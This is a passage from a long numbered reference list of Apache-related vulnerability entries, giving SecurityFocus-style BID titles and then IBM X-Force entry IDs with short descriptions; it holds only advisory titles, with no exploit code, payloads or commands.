14600| [44616] Apache Shiro Directory Traversal Vulnerability
14601| [44355] Apache MyFaces Encrypted View State Oracle Padding Security Vulnerability
14602| [44068] Apache::AuthenHook Local Information Disclosure Vulnerability
14603| [43862] Apache QPID SSL Connection Denial of Service Vulnerability
14604| [43673] Apache APR-util 'apr_brigade_split_line()' Denial of Service Vulnerability
14605| [43637] Apache XML-RPC SAX Parser Information Disclosure Vulnerability
14606| [43111] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
14607| [42637] Apache Derby 'BUILTIN' Authentication Insecure Password Hashing Vulnerability
14608| [42501] Apache CouchDB Cross Site Request Forgery Vulnerability
14609| [42492] Apache CXF XML DTD Processing Security Vulnerability
14610| [42121] Apache SLMS Insufficient Quoting Cross Site Request Forgery Vulnerability
14611| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
14612| [41963] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
14613| [41544] Apache Tomcat 'Transfer-Encoding' Information Disclosure and Denial Of Service Vulnerabilities
14614| [41076] Apache Axis2 '/axis2/axis2-admin' Session Fixation Vulnerability
14615| [40976] Apache Axis2 Document Type Declaration Processing Security Vulnerability
14616| [40827] Apache 'mod_proxy_http' Timeout Handling Information Disclosure Vulnerability
14617| [40343] Apache Axis2 'xsd' Parameter Directory Traversal Vulnerability
14618| [40327] Apache Axis2 'engagingglobally' Cross-Site Scripting Vulnerability
14619| [39771] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
14620| [39636] Apache ActiveMQ Source Code Information Disclosure Vulnerability
14621| [39635] Apache Tomcat Authentication Header Realm Name Information Disclosure Vulnerability
14622| [39538] Apache mod_auth_shadow Race Condition Security Bypass Vulnerability
14623| [39489] Apache OFBiz Multiple Cross Site Scripting and HTML Injection Vulnerabilities
14624| [39119] Apache ActiveMQ 'createDestination.action' HTML Injection Vulnerability
14625| [38580] Apache Subrequest Handling Information Disclosure Vulnerability
14626| [38494] Apache 'mod_isapi' Memory Corruption Vulnerability
14627| [38491] Apache mod_proxy_ajp Module Incoming Request Body Denial Of Service Vulnerability
14628| [37966] Apache 1.3 mod_proxy HTTP Chunked Encoding Integer Overflow Vulnerability
14629| [37945] Apache Tomcat Host Working Directory WAR File Directory Traversal Vulnerability
14630| [37944] Apache Tomcat WAR File Directory Traversal Vulnerability
14631| [37942] Apache Tomcat Directory Host Appbase Authentication Bypass Vulnerability
14632| [37149] Apache Tomcat 404 Error Page Cross Site Scripting Vulnerability
14633| [37027] RETIRED: Apache APR 'apr_uri_parse_hostinfo' Off By One Remote Code Execution Vulnerability
14634| [36990] Apache HTTP TRACE Cross Site Scripting Vulnerability
14635| [36954] Apache Tomcat Windows Installer Insecure Password Vulnerability
14636| [36889] TYPO3 Apache Solr Search Extension Unspecified Cross Site Scripting Vulnerability
14637| [36596] Apache HTTP Server Solaris Event Port Pollset Support Remote Denial Of Service Vulnerability
14638| [36260] Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability
14639| [36254] Apache mod_proxy_ftp Remote Command Injection Vulnerability
14640| [35949] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
14641| [35840] Apache HTTP Server HTTP-Basic Authentication Bypass Vulnerability
14642| [35623] Apache 'mod_deflate' Remote Denial Of Service Vulnerability
14643| [35565] Apache 'mod_proxy' Remote Denial Of Service Vulnerability
14644| [35416] Apache Tomcat XML Parser Information Disclosure Vulnerability
14645| [35263] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
14646| [35253] Apache APR-util 'xml/apr_xml.c' Denial of Service Vulnerability
14647| [35251] Apache APR-util 'apr_brigade_vprintf' Off By One Vulnerability
14648| [35221] Apache APR-util 'apr_strmatch_precompile()' Integer Underflow Vulnerability
14649| [35196] Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness
14650| [35193] Apache Tomcat Java AJP Connector Invalid Header Denial of Service Vulnerability
14651| [35115] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
14652| [34686] Apache Struts Multiple Cross Site Scripting Vulnerabilities
14653| [34663] Apache 'mod_proxy_ajp' Information Disclosure Vulnerability
14654| [34657] Apache Tiles Cross Site Scripting And Information Disclosure Vulnerabilities
14655| [34562] Apache Geronimo Application Server Multiple Remote Vulnerabilities
14656| [34552] Apache ActiveMQ Web Console Multiple Unspecified HTML Injection Vulnerabilities
14657| [34412] Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
14658| [34399] Apache Struts Unspecified Cross Site Scripting Vulnerability
14659| [34383] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
14660| [33913] Apache Tomcat POST Data Information Disclosure Vulnerability
14661| [33360] Apache Jackrabbit 'q' Parameter Multiple Cross Site Scripting Vulnerabilities
14662| [33110] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
14663| [32657] Novell NetWare ApacheAdmin Security Bypass Vulnerability
14664| [31805] Apache HTTP Server OS Fingerprinting Unspecified Security Vulnerability
14665| [31761] Oracle WebLogic Server Apache Connector Stack Based Buffer Overflow Vulnerability
14666| [31698] Apache Tomcat 'RemoteFilterValve' Security Bypass Vulnerability
14667| [31165] Kolab Groupware Server Apache Log File User Password Information Disclosure Vulnerability
14668| [30560] Apache 'mod_proxy_ftp' Wildcard Characters Cross-Site Scripting Vulnerability
14669| [30496] Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability
14670| [30494] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
14671| [29653] Apache 'mod_proxy_http' Interim Response Denial of Service Vulnerability
14672| [29502] Apache Tomcat Host Manager Cross Site Scripting Vulnerability
14673| [28576] Apache-SSL Environment Variable Information Disclosure and Privilege Escalation Vulnerability
14674| [28484] Apache Tomcat Requests Containing MS-DOS Device Names Information Disclosure Vulnerability
14675| [28483] Apache Tomcat 'allowLinking' Accepts NULL Byte in URI Information Disclosure Vulnerability
14676| [28482] Apache Tomcat SSL Anonymous Cipher Configuration Information Disclosure Vulnerability
14677| [28481] Apache Tomcat Cross-Site Scripting Vulnerability
14678| [28477] Apache Tomcat AJP Connector Information Disclosure Vulnerability
14679| [27752] Apache mod_jk2 Host Header Multiple Stack Based Buffer Overflow Vulnerabilities
14680| [27706] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
14681| [27703] Apache Tomcat Parameter Processing Remote Information Disclosure Vulnerability
14682| [27409] Apache 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
14683| [27365] Apache Tomcat SingleSignOn Remote Information Disclosure Vulnerability
14684| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
14685| [27236] Apache 'mod_proxy_balancer' Multiple Vulnerabilities
14686| [27234] Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
14687| [27006] Apache Tomcat JULI Logging Component Default Security Policy Vulnerability
14688| [26939] Apache HTTP Server Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
14689| [26838] Apache mod_imagemap and mod_imap Cross-Site Scripting Vulnerability
14690| [26762] Apache::AuthCAS Cookie SQL Injection Vulnerability
14691| [26663] Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
14692| [26287] Apache Geronimo SQLLoginModule Authentication Bypass Vulnerability
14693| [26070] Apache Tomcat WebDav Remote Information Disclosure Vulnerability
14694| [25804] Apache Geronimo Management EJB Security Bypass Vulnerability
14695| [25653] Apache Mod_AutoIndex.C Undefined Charset Cross-Site Scripting Vulnerability
14696| [25531] Apache Tomcat Cal2.JSP Cross-Site Scripting Vulnerability
14697| [25489] Apache HTTP Server Mod_Proxy Denial of Service Vulnerability
14698| [25316] Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities
14699| [25314] Apache Tomcat Host Manager Servlet Cross Site Scripting Vulnerability
14700| [25174] Apache Tomcat Error Message Reporting Cross Site Scripting Vulnerability
14701| [24999] Apache Tomcat SendMailServlet Cross-Site Scripting Vulnerability
14702| [24759] MySQLDumper Apache Access Control Authentication Bypass Vulnerability
14703| [24649] Apache HTTP Server Mod_Cache Denial of Service Vulnerability
14704| [24645] Apache HTTP Server Mod_Status Cross-Site Scripting Vulnerability
14705| [24553] Apache Mod_Mem_Cache Information Disclosure Vulnerability
14706| [24524] Apache Tomcat Accept-Language Cross Site Scripting Vulnerability
14707| [24480] Apache MyFaces Tomahawk JSF Framework Autoscroll Parameter Cross Site Scripting Vulnerability
14708| [24476] Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability
14709| [24475] Apache Tomcat Manager and Host Manager Upload Script Cross-Site Scripting Vulnerability
14710| [24215] Apache HTTP Server Worker Process Multiple Denial of Service Vulnerabilities
14711| [24147] Apache Tomcat JK Connector Double Encoding Security Bypass Vulnerability
14712| [24058] Apache Tomcat Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
14713| [23687] Apache AXIS Non-Existent WSDL Path Information Disclosure Vulnerability
14714| [23438] Apache HTTPD suEXEC Local Multiple Privilege Escalation Weaknesses
14715| [22960] Apache HTTP Server Tomcat Directory Traversal Vulnerability
14716| [22849] Apache mod_python Output Filter Mode Information Disclosure Vulnerability
14717| [22791] Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability
14718| [22732] Debian Apache Root Shell Local Privilege Escalation Vulnerabilities
14719| [22388] Apache Stats Extract Function Multiple Input Validation Vulnerabilities
14720| [21865] Apache And Microsoft IIS Range Denial of Service Vulnerability
14721| [21214] Apache Mod_Auth_Kerb Off-By-One Denial of Service Vulnerability
14722| [20527] Apache Mod_TCL Remote Format String Vulnerability
14723| [19661] Apache HTTP Server Arbitrary HTTP Request Headers Security Weakness
14724| [19447] Apache CGI Script Source Code Information Disclosure Vulnerability
14725| [19204] Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
14726| [19106] Apache Tomcat Information Disclosure Vulnerability
14727| [18138] Apache James SMTP Denial Of Service Vulnerability
14728| [17342] Apache Struts Multiple Remote Vulnerabilities
14729| [17095] Apache Log4Net Denial Of Service Vulnerability
14730| [16916] Apache mod_python FileSession Code Execution Vulnerability
14731| [16710] Apache Libapreq2 Quadratic Behavior Denial of Service Vulnerability
14732| [16260] Apache Geronimo Multiple Input Validation Vulnerabilities
14733| [16153] Apache mod_auth_pgsql Multiple Format String Vulnerabilities
14734| [16152] Apache Mod_SSL Custom Error Document Remote Denial Of Service Vulnerability
14735| [15834] Apache 'mod_imap' Referer Cross-Site Scripting Vulnerability
14736| [15765] Apache James Spooler Memory Leak Denial Of Service Vulnerability
14737| [15762] Apache MPM Worker.C Denial Of Service Vulnerability
14738| [15512] Apache Struts Error Response Cross-Site Scripting Vulnerability
14739| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
14740| [15325] Apache Tomcat Simultaneous Directory Listing Denial Of Service Vulnerability
14741| [15224] Apache Mod_Auth_Shadow Authentication Bypass Vulnerability
14742| [15177] PHP Apache 2 Local Denial of Service Vulnerability
14743| [14982] ApacheTop Insecure Temporary File Creation Vulnerability
14744| [14721] Apache Mod_SSL SSLVerifyClient Restriction Bypass Vulnerability
14745| [14660] Apache CGI Byterange Request Denial of Service Vulnerability
14746| [14366] Apache mod_ssl CRL Handling Off-By-One Buffer Overflow Vulnerability
14747| [14106] Apache HTTP Request Smuggling Vulnerability
14748| [13778] Apache HTPasswd Password Command Line Argument Buffer Overflow Vulnerability
14749| [13777] Apache HTPasswd User Command Line Argument Buffer Overflow Vulnerability
14750| [13756] Apache Tomcat Java Security Manager Bypass Vulnerability
14751| [13537] Apache HTDigest Realm Command Line Argument Buffer Overflow Vulnerability
14752| [12877] Apache mod_ssl ssl_io_filter_cleanup Remote Denial Of Service Vulnerability
14753| [12795] Apache Tomcat Remote Malformed Request Denial Of Service Vulnerability
14754| [12619] Apache Software Foundation Batik Squiggle Browser Access Validation Vulnerability
14755| [12519] Apache mod_python Module Publisher Handler Information Disclosure Vulnerability
14756| [12308] Apache Utilities Insecure Temporary File Creation Vulnerability
14757| [12217] Apache mod_auth_radius Malformed RADIUS Server Reply Integer Overflow Vulnerability
14758| [12181] Mod_DOSEvasive Apache Module Local Insecure Temporary File Creation Vulnerability
14759| [11803] Apache Jakarta Results.JSP Remote Cross-Site Scripting Vulnerability
14760| [11471] Apache mod_include Local Buffer Overflow Vulnerability
14761| [11360] Apache mod_ssl SSLCipherSuite Restriction Bypass Vulnerability
14762| [11239] Apache Satisfy Directive Access Control Bypass Vulnerability
14763| [11187] Apache Web Server Remote IPv6 Buffer Overflow Vulnerability
14764| [11185] Apache Mod_DAV LOCK Denial Of Service Vulnerability
14765| [11182] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
14766| [11154] Apache mod_ssl Remote Denial of Service Vulnerability
14767| [11094] Apache mod_ssl Denial Of Service Vulnerability
14768| [10789] Apache mod_userdir Module Information Disclosure Vulnerability
14769| [10736] Apache 'mod_ssl' Log Function Format String Vulnerability
14770| [10619] Apache ap_escape_html Memory Allocation Denial Of Service Vulnerability
14771| [10508] Apache Mod_Proxy Remote Negative Content-Length Buffer Overflow Vulnerability
14772| [10478] ClueCentral Apache Suexec Patch Security Weakness
14773| [10355] Apache 'mod_ssl' 'ssl_util_uuencode_binary()' Stack Buffer Overflow Vulnerability
14774| [10212] Apache mod_auth Malformed Password Potential Memory Corruption Vulnerability
14775| [9933] Apache mod_disk_cache Module Client Authentication Credential Storage Weakness
14776| [9930] Apache Error and Access Logs Escape Sequence Injection Vulnerability
14777| [9921] Apache Connection Blocking Denial Of Service Vulnerability
14778| [9885] Apache Mod_Security Module SecFilterScanPost Off-By-One Buffer Overflow Vulnerability
14779| [9874] Apache HTAccess LIMIT Directive Bypass Configuration Error Weakness
14780| [9829] Apache Mod_Access Access Control Rule Bypass Vulnerability
14781| [9826] Apache Mod_SSL HTTP Request Remote Denial Of Service Vulnerability
14782| [9733] Apache Cygwin Directory Traversal Vulnerability
14783| [9599] Apache mod_php Global Variables Information Disclosure Weakness
14784| [9590] Apache-SSL Client Certificate Forging Vulnerability
14785| [9571] Apache mod_digest Client-Supplied Nonce Verification Vulnerability
14786| [9471] Apache mod_perl Module File Descriptor Leakage Vulnerability
14787| [9404] Mod-Auth-Shadow Apache Module Expired User Credential Weakness
14788| [9302] Apache mod_php Module File Descriptor Leakage Vulnerability
14789| [9129] Apache mod_python Module Malformed Query Denial of Service Vulnerability
14790| [8926] Apache Web Server mod_cgid Module CGI Data Redirection Vulnerability
14791| [8919] Apache Mod_Security Module Heap Corruption Vulnerability
14792| [8911] Apache Web Server Multiple Module Local Buffer Overflow Vulnerability
14793| [8898] Red Hat Apache Directory Index Default Configuration Error
14794| [8883] Apache Cocoon Directory Traversal Vulnerability
14795| [8824] Apache Tomcat Non-HTTP Request Denial Of Service Vulnerability
14796| [8822] Apache Mod_Throttle Module Local Shared Memory Corruption Vulnerability
14797| [8725] Apache2 MOD_CGI STDERR Denial Of Service Vulnerability
14798| [8707] Apache htpasswd Password Entropy Weakness
14799| [8561] Apache::Gallery Insecure Local File Storage Privilege Escalation Vulnerability
14800| [8287] Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
14801| [8226] Apache HTTP Server Multiple Vulnerabilities
14802| [8138] Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability
14803| [8137] Apache Web Server Prefork MPM Denial Of Service Vulnerability
14804| [8136] Macromedia Apache Web Server Encoded Space Source Disclosure Vulnerability
14805| [8135] Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability
14806| [8134] Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness
14807| [7768] Apache Tomcat Insecure Directory Permissions Vulnerability
14808| [7725] Apache Basic Authentication Module Valid User Login Denial Of Service Vulnerability
14809| [7723] Apache APR_PSPrintf Memory Corruption Vulnerability
14810| [7448] Apache Mod_Auth_Any Remote Command Execution Vulnerability
14811| [7375] Apache Mod_Access_Referer NULL Pointer Dereference Denial of Service Vulnerability
14812| [7332] Apache Web Server OS2 Filestat Denial Of Service Vulnerability
14813| [7255] Apache Web Server File Descriptor Leakage Vulnerability
14814| [7254] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
14815| [6943] Apache Web Server MIME Boundary Information Disclosure Vulnerability
14816| [6939] Apache Web Server ETag Header Information Disclosure Weakness
14817| [6722] Apache Tomcat Web.XML File Contents Disclosure Vulnerability
14818| [6721] Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
14819| [6720] Apache Tomcat Example Web Application Cross Site Scripting Vulnerability
14820| [6662] Apache Web Server MS-DOS Device Name Denial Of Service Vulnerability
14821| [6661] Apache Web Server Default Script Mapping Bypass Vulnerability
14822| [6660] Apache Web Server Illegal Character HTTP Request File Disclosure Vulnerability
14823| [6659] Apache Web Server MS-DOS Device Name Arbitrary Code Execution Vulnerability
14824| [6562] Apache Tomcat Invoker Servlet File Disclosure Vulnerability
14825| [6320] Apache/Tomcat Mod_JK Chunked Encoding Denial Of Service Vulnerability
14826| [6117] Apache mod_php File Descriptor Leakage Vulnerability
14827| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
14828| [5996] Apache AB.C Web Benchmarking Buffer Overflow Vulnerability
14829| [5995] Apache AB.C Web Benchmarking Read_Connection() Buffer Overflow Vulnerability
14830| [5993] Multiple Apache HTDigest Buffer Overflow Vulnerabilities
14831| [5992] Apache HTDigest Insecure Temporary File Vulnerability
14832| [5991] Apache HTDigest Arbitrary Command Execution Vulnerability
14833| [5990] Apache HTPasswd Insecure Temporary File Vulnerability
14834| [5981] Multiple Apache HTDigest and HTPassWD Component Vulnerabilites
14835| [5884] Apache Web Server Scoreboard Memory Segment Overwriting SIGUSR1 Sending Vulnerability
14836| [5847] Apache Server Side Include Cross Site Scripting Vulnerability
14837| [5838] Apache Tomcat 3.2 Directory Disclosure Vulnerability
14838| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
14839| [5791] HP VirtualVault Apache mod_ssl Denial Of Service Vulnerability
14840| [5787] Apache Oversized STDERR Buffer Denial Of Service Vulnerability
14841| [5786] Apache Tomcat DefaultServlet File Disclosure Vulnerability
14842| [5542] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
14843| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
14844| [5485] Apache 2.0 Path Disclosure Vulnerability
14845| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
14846| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
14847| [5194] Apache Tomcat DOS Device Name Cross Site Scripting Vulnerability
14848| [5193] Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability
14849| [5067] Apache Tomcat Null Character Malformed Request Denial Of Service Vulnerability
14850| [5054] Apache Tomcat Web Root Path Disclosure Vulnerability
14851| [5033] Apache Chunked-Encoding Memory Corruption Vulnerability
14852| [4995] Apache Tomcat JSP Engine Denial of Service Vulnerability
14853| [4878] Apache Tomcat RealPath.JSP Malformed Request Information Disclosure Vulnerability
14854| [4877] Apache Tomcat Example Files Web Root Path Disclosure Vulnerability
14855| [4876] Apache Tomcat Source.JSP Malformed Request Information Disclosure Vulnerability
14856| [4575] Apache Tomcat Servlet Path Disclosure Vulnerability
14857| [4557] Apache Tomcat System Path Information Disclosure Vulnerability
14858| [4437] Apache Error Message Cross-Site Scripting Vulnerability
14859| [4431] Apache PrintEnv/Test_CGI Script Injection Vulnerability
14860| [4358] Apache Double-Reverse Lookup Log Entry Spoofing Vulnerability
14861| [4335] Apache Win32 Batch File Remote Command Execution Vulnerability
14862| [4292] Oracle 9iAS Apache PL/SQL Module Web Administration Access Vulnerability
14863| [4189] Apache mod_ssl/Apache-SSL Buffer Overflow Vulnerability
14864| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
14865| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
14866| [4037] Oracle 9iAS Apache PL/SQL Module Denial of Service Vulnerability
14867| [4032] Oracle 9iAS Apache PL/SQL Module Multiple Buffer Overflows Vulnerability
14868| [3796] Apache HTTP Request Unexpected Behavior Vulnerability
14869| [3790] Apache Non-Existent Log Directory Denial Of Service Vulnerability
14870| [3786] Apache Win32 PHP.EXE Remote File Disclosure Vulnerability
14871| [3727] Oracle 9I Application Server PL/SQL Apache Module Directory Traversal Vulnerability
14872| [3726] Oracle 9I Application Server PL/SQL Apache Module Buffer Overflow Vulnerability
14873| [3596] Apache Split-Logfile File Append Vulnerability
14874| [3521] Apache mod_usertrack Predictable ID Generation Vulnerability
14875| [3335] Red Hat Linux Apache Remote Username Enumeration Vulnerability
14876| [3316] MacOS X Client Apache Directory Contents Disclosure Vulnerability
14877| [3256] Apache mod_auth_oracle Remote SQL Query Manipulation Vulnerability
14878| [3255] Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability
14879| [3254] Apache AuthPG Remote SQL Query Manipulation Vulnerability
14880| [3253] Apache mod_auth_pgsql_sys Remote SQL Query Manipulation Vulnerability
14881| [3251] Apache mod_auth_pgsql Remote SQL Query Manipulation Vulnerability
14882| [3176] Apache Mod ReWrite Rules Bypassing Image Linking Vulnerability
14883| [3169] Apache Server Address Disclosure Vulnerability
14884| [3009] Apache Possible Directory Index Disclosure Vulnerability
14885| [2982] Apache Tomcat Cross-Site Scripting Vulnerability
14886| [2852] MacOS X Client Apache File Protection Bypass Vulnerability
14887| [2740] Apache Web Server HTTP Request Denial of Service Vulnerability
14888| [2518] Apache Tomcat 3.0 Directory Traversal Vulnerability
14889| [2503] Apache Artificially Long Slash Path Directory Listing Vulnerability
14890| [2300] NCSA/Apache httpd ScriptAlias Source Retrieval Vulnerability
14891| [2216] Apache Web Server DoS Vulnerability
14892| [2182] Apache /tmp File Race Vulnerability
14893| [2171] Oracle Apache+WebDB Documented Backdoor Vulnerability
14894| [2060] Apache Web Server with Php 3 File Disclosure Vulnerability
14895| [1821] Apache mod_cookies Buffer Overflow Vulnerability
14896| [1728] Apache Rewrite Module Arbitrary File Disclosure Vulnerability
14897| [1658] SuSE Apache CGI Source Code Viewing Vulnerability
14898| [1656] SuSE Apache WebDAV Directory Listings Vulnerability
14899| [1575] Trustix Apache-SSL RPM Permissions Vulnerability
14900| [1548] Apache Jakarta-Tomcat /admin Context Vulnerability
14901| [1532] Apache Tomcat Snoop Servlet Information Disclosure Vulnerability
14902| [1531] Apache Tomcat 3.1 Path Revealing Vulnerability
14903| [1457] Apache::ASP source.asp Example Script Vulnerability
14904| [1284] Apache HTTP Server (win32) Root Directory Access Vulnerability
14905| [1083] Cobalt Raq Apache .htaccess Disclosure Vulnerability
14906|
14907| IBM X-Force - https://exchange.xforce.ibmcloud.com:
14908| [86258] Apache CloudStack text fields cross-site scripting
14909| [85983] Apache Subversion mod_dav_svn module denial of service
14910| [85875] Apache OFBiz UEL code execution
14911| [85874] Apache OFBiz Webtools View Log screen cross-site scripting
14912| [85871] Apache HTTP Server mod_session_dbd unspecified
14913| [85756] Apache Struts OGNL expression command execution
14914| [85755] Apache Struts DefaultActionMapper class open redirect
14915| [85586] Apache ActiveMQ CVE-2013-1879 cross-site scripting
14916| [85574] Apache HTTP Server mod_dav denial of service
14917| [85573] Apache Struts Showcase App OGNL code execution
14918| [85496] Apache CXF denial of service
14919| [85423] Apache Geronimo RMI classloader code execution
14920| [85326] Apache Santuario XML Security for C++ buffer overflow
14921| [85323] Apache Santuario XML Security for Java spoofing
14922| [85319] Apache Qpid Python client SSL spoofing
14923| [85019] Apache Santuario XML Security for C++ CVE-2013-2156 buffer overflow
14924| [85018] Apache Santuario XML Security for C++ CVE-2013-2155 denial of service
14925| [85017] Apache Santuario XML Security for C++ CVE-2013-2154 buffer overflow
14926| [85016] Apache Santuario XML Security for C++ CVE-2013-2153 spoofing
14927| [84952] Apache Tomcat CVE-2012-3544 denial of service
14928| [84763] Apache Struts CVE-2013-2135 security bypass
14929| [84762] Apache Struts CVE-2013-2134 security bypass
14930| [84719] Apache Subversion CVE-2013-2088 command execution
14931| [84718] Apache Subversion CVE-2013-2112 denial of service
14932| [84717] Apache Subversion CVE-2013-1968 denial of service
14933| [84577] Apache Tomcat security bypass
14934| [84576] Apache Tomcat symlink
14935| [84543] Apache Struts CVE-2013-2115 security bypass
14936| [84542] Apache Struts CVE-2013-1966 security bypass
14937| [84154] Apache Tomcat session hijacking
14938| [84144] Apache Tomcat denial of service
14939| [84143] Apache Tomcat information disclosure
14940| [84111] Apache HTTP Server command execution
14941| [84043] Apache Virtual Computing Lab cross-site scripting
14942| [84042] Apache Virtual Computing Lab cross-site scripting
14943| [83782] Apache CloudStack information disclosure
14944| [83781] Apache CloudStack security bypass
14945| [83720] Apache ActiveMQ cross-site scripting
14946| [83719] Apache ActiveMQ denial of service
14947| [83718] Apache ActiveMQ denial of service
14948| [83263] Apache Subversion denial of service
14949| [83262] Apache Subversion denial of service
14950| [83261] Apache Subversion denial of service
14951| [83259] Apache Subversion denial of service
14952| [83035] Apache mod_ruid2 security bypass
14953| [82852] Apache Qpid federation_tag security bypass
14954| [82851] Apache Qpid qpid::framing::Buffer denial of service
14955| [82758] Apache Rave User RPC API information disclosure
14956| [82663] Apache Subversion svn_fs_file_length() denial of service
14957| [82642] Apache Qpid qpid::framing::Buffer::checkAvailable() denial of service
14958| [82641] Apache Qpid AMQP denial of service
14959| [82626] Apache HTTP Server on Debian GNU/Linux Debian apache2ctl symlink
14960| [82618] Apache Commons FileUpload symlink
14961| [82360] Apache HTTP Server manager interface cross-site scripting
14962| [82359] Apache HTTP Server hostnames cross-site scripting
14963| [82338] Apache Tomcat log/logdir information disclosure
14964| [82328] Apache Maven and Apache Maven Wagon SSL spoofing
14965| [82268] Apache OpenJPA deserialization command execution
14966| [81981] Apache CXF UsernameTokens security bypass
14967| [81980] Apache CXF WS-Security security bypass
14968| [81398] Apache OFBiz cross-site scripting
14969| [81240] Apache CouchDB directory traversal
14970| [81226] Apache CouchDB JSONP code execution
14971| [81225] Apache CouchDB Futon user interface cross-site scripting
14972| [81211] Apache Axis2/C SSL spoofing
14973| [81167] Apache CloudStack DeployVM information disclosure
14974| [81166] Apache CloudStack AddHost API information disclosure
14975| [81165] Apache CloudStack createSSHKeyPair API information disclosure
14976| [80518] Apache Tomcat cross-site request forgery security bypass
14977| [80517] Apache Tomcat FormAuthenticator security bypass
14978| [80516] Apache Tomcat NIO denial of service
14979| [80408] Apache Tomcat replay-countermeasure security bypass
14980| [80407] Apache Tomcat HTTP Digest Access Authentication security bypass
14981| [80317] Apache Tomcat slowloris denial of service
14982| [79984] Apache Commons HttpClient SSL spoofing
14983| [79983] Apache CXF SSL spoofing
14984| [79830] Apache Axis2/Java SSL spoofing
14985| [79829] Apache Axis SSL spoofing
14986| [79809] Apache Tomcat DIGEST security bypass
14987| [79806] Apache Tomcat parseHeaders() denial of service
14988| [79540] Apache OFBiz unspecified
14989| [79487] Apache Axis2 SAML security bypass
14990| [79212] Apache Cloudstack code execution
14991| [78734] Apache CXF SOAP Action security bypass
14992| [78730] Apache Qpid broker denial of service
14993| [78617] Eucalyptus Apache Santuario (XML Security for Java) denial of service
14994| [78563] Apache mod_pagespeed module unspecified cross-site scripting
14995| [78562] Apache mod_pagespeed module security bypass
14996| [78454] Apache Axis2 security bypass
14997| [78452] Websense Web Security and Web Filter Apache Tomcat information disclosure
14998| [78451] Websense Web Security and Web Filter Apache Tomcat cross-site scripting
14999| [78321] Apache Wicket unspecified cross-site scripting
15000| [78183] Apache Struts parameters denial of service
15001| [78182] Apache Struts cross-site request forgery
15002| [78153] Apache Solr Autocomplete module for Drupal autocomplete results cross-site scripting
15003| [77987] mod_rpaf module for Apache denial of service
15004| [77958] Apache Struts skill name code execution
15005| [77914] Apache HTTP Server mod_negotiation module cross-site scripting
15006| [77913] Apache HTTP Server mod_proxy_ajp information disclosure
15007| [77568] Apache Qpid broker security bypass
15008| [77421] Apache Libcloud spoofing
15009| [77059] Oracle Solaris Cluster Apache Tomcat Agent unspecified
15010| [77046] Oracle Solaris Apache HTTP Server information disclosure
15011| [76837] Apache Hadoop information disclosure
15012| [76802] Apache Sling CopyFrom denial of service
15013| [76692] Apache Hadoop symlink
15014| [76535] Apache Roller console cross-site request forgery
15015| [76534] Apache Roller weblog cross-site scripting
15016| [76152] Apache CXF elements security bypass
15017| [76151] Apache CXF child policies security bypass
15018| [75983] MapServer for Windows Apache file include
15019| [75857] Apache Commons Compress and Apache Ant bzip2 denial of service
15020| [75558] Apache POI denial of service
15021| [75545] PHP apache_request_headers() buffer overflow
15022| [75302] Apache Qpid SASL security bypass
15023| [75211] Debian GNU/Linux apache 2 cross-site scripting
15024| [74901] Apache HTTP Server LD_LIBRARY_PATH privilege escalation
15025| [74871] Apache OFBiz FlexibleStringExpander code execution
15026| [74870] Apache OFBiz multiple cross-site scripting
15027| [74750] Apache Hadoop unspecified spoofing
15028| [74319] Apache Struts XSLTResult.java file upload
15029| [74313] Apache Traffic Server header buffer overflow
15030| [74276] Apache Wicket directory traversal
15031| [74273] Apache Wicket unspecified cross-site scripting
15032| [74181] Apache HTTP Server mod_fcgid module denial of service
15033| [73690] Apache Struts OGNL code execution
15034| [73432] Apache Solr extension for TYPO3 unspecified cross-site scripting
15035| [73100] Apache MyFaces in directory traversal
15036| [73096] Apache APR hash denial of service
15037| [73052] Apache Struts name cross-site scripting
15038| [73030] Apache CXF UsernameToken security bypass
15039| [72888] Apache Struts lastName cross-site scripting
15040| [72758] Apache HTTP Server httpOnly information disclosure
15041| [72757] Apache HTTP Server MPM denial of service
15042| [72585] Apache Struts ParameterInterceptor security bypass
